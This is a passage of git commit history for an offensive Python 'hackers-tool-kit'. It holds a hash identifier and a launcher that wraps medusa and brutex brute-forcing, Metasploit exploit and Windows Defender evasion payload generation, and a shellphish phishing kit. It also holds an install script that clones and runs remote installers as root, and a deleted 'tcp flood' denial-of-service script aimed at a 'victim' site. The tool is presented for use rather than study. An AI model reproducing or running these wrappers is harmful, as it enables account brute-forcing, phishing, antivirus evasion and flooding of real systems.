len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') + os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') + os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) + os.system('echo "run\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> handler.rc'.format(f)) + os.system('echo "show options\n" >> handler.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> handler.rc') + os.system('echo "services\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + found = True +mainbanner() +main() From ecaae29e190b60f2cb30f0bf5ce5577ef5c8a57f Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 06:01:12 +0100 Subject: [PATCH 025/214] Delete install.py --- install.py | 99 ------------------------------------------------------ 1 file changed, 99 deletions(-) delete mode 100644 install.py diff --git a/install.py b/install.py deleted file mode 100644 index 61eb850..0000000 --- a/install.py +++ /dev/null @@ -1,99 +0,0 @@ -import sys -import os - -def install(): - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat -y") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - - -print "are you running on the real kali linux os [y/n]" -check = raw_input("[y/n]> ") -if check == "y" : - print "ok most tools should work for you you might have to install other" - print "things on your os for this to work if it doesnt work" - os.system("sleep 2") - install() - -if check == "n" : - print "then some of the tools in this script might not work" - print "do you want to continue installation [y/n]" - install = raw_input("[y/n]> ") - if install == "y" : - def install(): - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - install() - if install == "n" : - print "thanks for checking out my script" - sys.exit() From 956cbe2cf6a2f9344bd09f6eff68b2ad8c76ce62 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 06:01:28 +0100 Subject: [PATCH 026/214] Add files via upload --- install.py | 101 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 install.py diff --git a/install.py b/install.py new file mode 100644 index 0000000..5b31b8d --- /dev/null +++ b/install.py @@ -0,0 +1,101 @@ +import sys +import os + +def install(): + os.system("apt install sslscan") + os.system("apt install crunch") + os.system("apt install tcpdump") + os.system("apt install macchanger") + os.system("apt install wafw00f") + os.system("apt install medusa") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("pip install colorama") + os.system("pip install dnspython") + os.system("pip install shodan") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat -y") + os.system("apt install nc") + os.system("apt install neofetch") + os.system("apt install cupp") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") + + + +print "are you running on the real kali linux os [y/n]" +check = raw_input("[y/n]> ") +if check == "y" : + print "ok most tools should work for you you might have to install other" + print "things on your os for this to work if it doesnt work" + os.system("sleep 2") + install() + +if check == "n" : + print "then some of the tools in this script might not work" + print "do you want to continue installation [y/n]" + install = raw_input("[y/n]> ") + if install == "y" : + def install(): + os.system("apt install sslscan") + os.system("apt install crunch") + os.system("apt install tcpdump") + os.system("apt install macchanger") + os.system("apt install wafw00f") + os.system("apt install medusa") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat") + os.system("apt install nc") + os.system("apt install neofetch") + os.system("apt install cupp") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") + + install() + if install == "n" : + print "thanks for checking out my script" + sys.exit() From 4d3f9a00a1dedb03d6da3f5cc3e5af0ed083163f Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 06:17:34 +0100 Subject: [PATCH 027/214] Delete tcp --- tcp | 144 ------------------------------------------------------------ 1 file changed, 144 deletions(-) delete mode 100644 tcp diff --git a/tcp b/tcp deleted file mode 100644 index b662c84..0000000 --- a/tcp +++ /dev/null @@ -1,144 +0,0 @@ -import socket -from time import sleep -from threading import Thread, active_count -from os import * -import random -import string -import signal -import ssl -import argparse -import sys - -example_text = ''' \nTips: Target page with 1500+ bytes size. -example: - python %s example.com/test.php -p 80 -http - python %s example.com/hello/ -p 443 -ssl -http - python %s example.com -p 80 -http - python %s example.com -p 21 -payload 68656c6c6f - python %s example.com -p 22 -Connects - TCP handshakes towards victim -Payloads - Recevied payloads by victim -Dropped - TCP handshakes or payloads rejected by victim (site down) - -''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0]) - -parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawTextHelpFormatter) -parser._action_groups.pop() -required = parser.add_argument_group('required arguments') -optional = parser.add_argument_group('optional arguments') - -required.add_argument('target', help='Specify a target to attack') -required.add_argument('-p', dest='port', help='Specify port to attack', type=int, required=True) - -optional.add_argument('-t', dest='THREADS', type=int, default=300, help='Threads, default = 300 threads') -optional.add_argument('-ssl', action='store_true', help='Enable SSL') -optional.add_argument('-http', action='store_true', help='Enable HTTP headers (only if custom payload not set)') -optional.add_argument('-payload', help='Set payload as hex-string') - - - -print("\ntcp flood.\n") -args = parser.parse_args() -connected = 0 -dropped = 0 -payloads = 0 -port = args.port - - -# 